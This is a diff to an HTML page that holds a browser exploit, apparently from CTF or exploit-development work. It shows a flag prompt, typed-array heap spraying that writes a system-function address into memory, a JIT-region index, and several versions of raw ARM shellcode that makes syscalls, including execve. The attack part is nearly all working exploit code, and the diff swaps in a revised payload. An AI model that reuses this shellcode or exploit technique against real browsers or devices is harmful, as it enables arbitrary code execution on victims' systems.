--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start666");
+alert("start6667");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -178,7 +178,8 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfe\xff\xff\x0a\x60\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x40\x70\xa0\xe3\x00\x00\xa0\xe1\x34\x10\x9f\xe5\x00\x00\x81\xe5\x30\x00\x9f\xe5\x30\x10\x9f\xe5\x30\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x28\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x02\x00\x50\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50";
+var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x20\x00\x9f\xe5\x20\x10\x9f\xe5\x20\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50"
+    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfe\xff\xff\x0a\x60\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x40\x70\xa0\xe3\x00\x00\xa0\xe1\x34\x10\x9f\xe5\x00\x00\x81\xe5\x30\x00\x9f\xe5\x30\x10\x9f\xe5\x30\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x28\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x02\x00\x50\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50";
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x20\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50";
 
  //"\x28\x40\x14\xe5\x10\x00\x9f\xe5\x10\x10\x9f\xe5\x00\x20\x91\xe5\x00\x10\xa0\xe3\x12\xff\x2f\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x01\x00\x50";
